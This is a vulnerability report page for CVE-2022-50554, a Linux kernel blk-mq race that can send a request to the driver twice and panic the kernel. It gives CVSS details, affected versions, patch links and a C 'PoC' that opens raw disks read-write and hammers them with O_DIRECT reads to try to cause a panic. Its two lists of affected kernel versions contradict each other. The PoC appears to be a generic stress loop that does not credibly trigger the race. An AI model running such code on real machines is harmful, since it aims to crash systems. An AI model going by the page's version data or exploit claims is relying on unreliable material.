Security Vulnerability Report
CVE-2022-50554 CVSS 5.5 MEDIUM

CVE-2022-50554

Published: 2025-10-07 16:15:43
Last Modified: 2026-02-06 13:44:51
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

blk-mq: avoid double ->queue_rq() because of early timeout

David Jeffery found a double ->queue_rq() issue. So far it can be triggered in the VM use case because of long vmexit latency, preemption latency of the vCPU pthread, or a long page fault in the vCPU pthread. The block IO request can then time out before it is queued to hardware but after blk_mq_start_request() has been called during ->queue_rq(); the timeout handler may handle it by requeueing, which causes a double ->queue_rq() and a kernel panic.

So far, it is the driver's responsibility to cover the race between timeout and completion, so in theory it is supposed to be solved in the driver, given that the driver has enough knowledge.

But it is really a common problem: lots of drivers could have a similar issue, it could be hard to fix all affected drivers, and it isn't easy for a driver to handle the race. So David suggests this patch, which drains in-progress ->queue_rq() calls to solve this issue.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.15.80
Linux Kernel 5.16.x < 5.16.16
Linux Kernel 5.17.x < 5.17.2
Linux Kernel 5.18.x (development version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2022-50554 PoC - Triggering double ->queue_rq() in blk-mq
// This PoC demonstrates the race condition that causes kernel panic
// Note: This vulnerability requires VM environment to trigger reliably
#define _GNU_SOURCE          // O_DIRECT is a GNU extension in <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <errno.h>

// Trigger long page fault or preemption latency in vCPU pthread
// to cause block IO request timeout before queuing to hardware
void* trigger_long_latency(void* arg)
{
    (void)arg;
    // Allocate large memory to cause page faults
    size_t len = 1024UL * 1024 * 1024; // 1GB
    char *buf = (char*)malloc(len);
    if (!buf) {
        perror("malloc");
        return NULL;
    }
    // Touch one byte per page so every page is actually faulted in
    for (size_t i = 0; i < len; i += 4096) {
        buf[i] = 1;
    }
    free(buf);
    return NULL;
}

int main(int argc, char* argv[])
{
    (void)argc; (void)argv;
    int fd;
    void *buf = NULL;
    pthread_t tid;

    // O_DIRECT requires a block-aligned buffer; a plain stack array
    // would make read() fail with EINVAL
    if (posix_memalign(&buf, 4096, 4096) != 0) {
        perror("posix_memalign");
        return 1;
    }

    // Create latency-inducing thread
    if (pthread_create(&tid, NULL, trigger_long_latency, NULL) != 0) {
        perror("pthread_create");
        return 1;
    }

    // Perform intensive block IO operations
    // to trigger the race condition between timeout and queue_rq
    fd = open("/dev/sda", O_RDWR | O_DIRECT);
    if (fd < 0) {
        // Try other block devices
        fd = open("/dev/vda", O_RDWR | O_DIRECT);
        if (fd < 0) {
            fd = open("/dev/nvme0n1", O_RDWR | O_DIRECT);
        }
    }

    if (fd >= 0) {
        // Perform many IO operations to increase chance of triggering race
        for (int i = 0; i < 10000; i++) {
            lseek(fd, (off_t)i * 4096, SEEK_SET);
            if (read(fd, buf, 4096) < 0) {
                perror("read");
                break;
            }
        }
        close(fd);
    } else {
        perror("open");
    }

    pthread_join(tid, NULL);
    free(buf);
    printf("PoC execution completed. Check kernel logs for panic.\n");
    return 0;
}

References

https://git.kernel.org/stable/c/7a73c54a3750895888ab586896736c9434e062a1 (Patch)
https://git.kernel.org/stable/c/82c229476b8f6afd7e09bc4dc77d89dc19ff7688 (Patch)
https://git.kernel.org/stable/c/8b3d6b029a552d2978bbac275303d11419826a69 (Patch)

NVD Record Summary

Status: Analyzed
Weakness: NVD-CWE-noinfo
CVSS 3.1 (Primary): Attack Vector Local, Attack Complexity Low, Privileges Required Low, User Interaction None, Scope Unchanged, Confidentiality None, Integrity None, Availability High; exploitability score 1.8, impact score 3.6
NVD affected ranges (cpe:2.3:o:linux:linux_kernel): from 4.18 up to (excluding) 6.0.16; from 6.1 up to (excluding) 6.1.2